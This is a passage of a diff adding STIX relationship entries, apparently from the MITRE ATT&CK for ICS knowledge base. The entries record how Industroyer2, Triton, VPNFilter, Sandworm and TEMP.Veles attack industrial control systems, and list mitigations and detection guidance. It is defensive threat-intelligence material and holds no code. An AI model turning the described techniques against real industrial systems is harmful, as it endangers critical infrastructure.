Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:25:41.475Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) uses a General Interrogation command to monitor the device’s Information Object Addresses (IOAs) and their IO state values.(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--575f0e0b-d68d-432b-abb3-cbd3e641fc88", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.199Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. 
Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid reporting messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e852e64c-b5e0-4e7f-a189-bbc7aa7932c7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.097Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 
2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "This technique may not be effectively mitigated against, consider controls for assets and processes that lead to the use of this technique.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b48be9f9-de0e-4548-ade3-09d47af52798", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:03:58.153Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. 
In cases where alternative methods of communicating with outstations exist alarms may still be visible even if command messages are blocked.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f664bf42-5fb2-41e5-b790-978ddf866da3", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T17:45:58.655Z", + "description": "Monitor for information collection on assets that may indicate deviations from standard operational tools. Examples include unexpected industrial automation protocol functions, new high volume communication sessions, or broad collection across many hosts within the network. 
", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0d305450-d5ca-46fe-8583-36c983dd0a88", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:43:33.144Z", + "description": "Monitor ICS management protocols for functions that change an asset’s operating mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6ff846b1-9444-45f1-837a-4eeeb16bdfe7", + "created": "2023-03-30T19:25:22.673Z", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. 
Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:25:22.673Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) leverages a hardcoded list of remote-station IP addresses to iteratively initiate communications and collect information across multiple priority IEC-104 priority levels.(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0c284ce0-0be2-4164-b686-7c383b246aec", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Research Whitepapers September 2018", + "description": "ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + }, + { + "source_name": "Intel", + "description": "Intel ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 Intel Hardware-based Security Technologies for Intelligent Retail Devices Retrieved. 
2020/09/25 ", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Trusted Platform Module (TPM) Summary Retrieved. 2020/09/25 ", + "url": "https://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:19:56.151Z", + "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: N/A) Move system's root of trust to hardware to prevent tampering with the SPI flash memory. (Citation: ESET Research Whitepapers September 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel)\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--48489baf-56c2-423e-964a-0a61688e4a19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.224Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. 
Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--95b12e1a-7f21-4fa0-9b2a-c96c7c270625", + "created": "2021-10-14T21:33:27.046Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Electrum Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/electrum/" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:01:17.079Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) used the credentials of valid accounts to interact with client applications and access employee workstations hosting HMI applications. 
(Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)(Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6f2c2043-6487-467a-bb49-e8cd2509ae9f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.112Z", + "relationship_type": "mitigates", + "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and public disclosure.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--350814da-5c36-42f9-8e58-8f9534e6ce0a", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FireEye TRITON", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer. (2017, December 14). Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure. 
Retrieved January 6, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T20:49:30.525Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s injector, inject.bin, masquerades as a standard compiled PowerPC program for the Tricon. (Citation: DHS CISA February 2019)\n\n[Triton](https://attack.mitre.org/software/S1009) was configured to masquerade as trilog.exe, which is the Triconex software for analyzing SIS logs.(Citation: FireEye TRITON)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--54e73627-95de-4e6e-abf0-d93e20a1fe8f", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:07:49.346Z", + "description": "Monitor for device alarms produced when program uploads occur, although not all devices will produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": 
"attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e09e253c-fd28-49ae-988e-1f80d769e8b8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.227Z", + "relationship_type": "mitigates", + "description": "Prevent the use of unsigned executables, such as installers and scripts.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--71c81024-ea36-4853-940a-cd9d4cbcabed", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:05:39.957Z", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) utilized remote desktop protocol (RDP) jump boxes to move into the ICS environment. 
(Citation: Dragos December 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cb30d507-edc6-4197-947c-7b3a6e395c0d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.178Z", + "relationship_type": "mitigates", + "description": "Utilize code signatures to verify the integrity of the installed program on safety or control assets has not been changed.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3f5f9f9d-9bb3-4461-b85b-501f6077e7b8", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:51.224Z", + "description": "Monitor executed commands and arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", 
+ "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e5afc447-a241-4773-9a8a-3d6fd205d926", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Utilize exploit protection to prevent activities which may be exploited through malicious web sites.\n", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6acf3236-d7e6-416c-90e5-5cf6bd89e01d", + "created": "2023-03-30T14:09:40.255Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:09:40.255Z", + "description": "Monitor for device alarms produced when device management passwords are changed, although not all devices will produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--79fccaf1-3592-4af0-8a47-1d325b9fd5a4", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:46:05.831Z", + "description": "Monitor for newly constructed web-based network connections that are sent to malicious or suspicious destinations (e.g., destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g., monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, SCF, HTA, MSI, DLLs, or msiexec.exe). ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d8f45959-e0fc-4b4f-a074-a3acea926300", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.194Z", + "relationship_type": "mitigates", + "description": "Consider the disabling of features such as AutoRun.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": 
"relationship--98f1d575-a975-42ae-8b00-2c9e22d560d5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.127Z", + "relationship_type": "mitigates", + "description": "Set and enforce secure password policies for accounts.\n", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--2e0769d7-088e-45d5-a262-6dbc91a95073", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:51:31.992Z", + "description": "Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--46332a77-2fd6-4033-96cf-6163172775ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.164Z", + "relationship_type": "mitigates", + "description": 
"Devices should verify that firmware has been properly signed by the vendor before allowing installation.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--cad91f87-7cc7-4771-8c7b-1599793ed3c1", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Carl Hurd March 2019", + "description": "Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28 ", + "url": "https://www.youtube.com/watch?v=yuZazP22rpI" + }, + { + "source_name": "William Largent June 2018", + "description": "William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28 ", + "url": "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:31:19.732Z", + "description": "The [VPNFilter](https://attack.mitre.org/software/S1010) packet sniffer looks for basic authentication as well as monitors ICS traffic, and is specific to the TP-LINK R600-VPN. The malware uses a raw socket to look for connections to a pre-specified IP address, only looking at TCP packets that are 150 bytes or larger. Packets that are not on port 502, are scanned for BasicAuth, and that information is logged. This may have allowed credential harvesting from communications between devices accessing a modbus-enabled HMI. 
(Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)", + "relationship_type": "uses", + "source_ref": "malware--6108f800-10b8-4090-944e-be579f01263d", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--193c3cd3-0b22-4839-a1fa-413aee61e882", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:40.378Z", + "description": "Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8a07f92e-9384-4967-9cd9-ffa08a0e55bf", + "created": "2023-03-30T19:01:40.038Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:01:40.038Z", + "description": "Monitor for any suspicious attempts to enable scripts running on a system. 
If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 